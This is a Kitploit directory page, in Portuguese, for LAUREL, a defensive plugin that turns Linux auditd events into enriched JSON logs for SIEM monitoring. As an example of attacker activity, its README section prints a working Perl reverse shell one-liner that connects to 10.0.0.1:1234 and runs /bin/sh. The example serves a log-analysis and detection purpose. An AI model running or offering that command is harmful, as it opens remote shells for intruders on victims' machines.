Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
laurel — Transforme logs de auditoria do Linux para uso em SIEM | Kitploit
Ferramentas/GitHubGitHub/threathunters-io/laurel
Ferramentas DefensivasAnálise de Logs
GitHubthreathunters-io/laurel

laurel

Transforme logs de auditoria do Linux para uso em SIEM

Ver Repositório
85165há 2 diasRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

logo

Linux Audit – Logging Usável, Robusto e Fácil

Build Status

LAUREL é um plugin de pós-processamento de eventos para auditd(8) que gera logs de auditoria baseados em JSON, úteis e enriquecidos, adequados para configurações modernas de monitoramento de segurança.

A documentação correspondente à última versão estável pode ser encontrada aqui.

Por quê?

TLDR: Em vez de eventos de auditoria que se parecem com isso…

root@kitploit:~
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…LAUREL os transforma em logs JSON onde a bagunça que atacantes/testadores de penetração/equipes vermelhas estão tentando fazer se torna aparente à primeira vista:

root@kitploit:~
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

Isso acontece na origem porque LAUREL é executado no host onde os eventos de auditoria são gerados. Os eventos são enriquecidos com informações úteis sobre o processo pai (ppid):

root@kitploit:~
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Documentação

Detalhes de configuração e operacionais são descritos na página de manual laurel(8). Detalhes sobre o formato de log e as justificativas podem ser encontrados na página de manual laurel-about(7). A página laurel-audit-rules(7) contém conselhos e exemplos para configurar regras de auditoria úteis para detectar táticas de atacantes.

As instruções de instalação do LAUREL contêm instruções sobre como compilar o LAUREL a partir do código-fonte e como instalá-lo e configurá-lo.

Desenvolvemos o LAUREL porque não estávamos satisfeitos com os conjuntos de recursos e características de desempenho de projetos e produtos existentes. Consulte o documento Performance para obter detalhes.

Veja também

  • ansible-auditd-laurel, um role Ansible para implantar auditd + laurel, por @0xFustang / CERT-EU

Licença

GNU General Public License, versão 3

Autores

  • Hilko Bengen <[email protected]>
  • Sergej Schmidt <[email protected]>

O logotipo foi criado por Birgit Meyer <[email protected]>.

Baixar ferramenta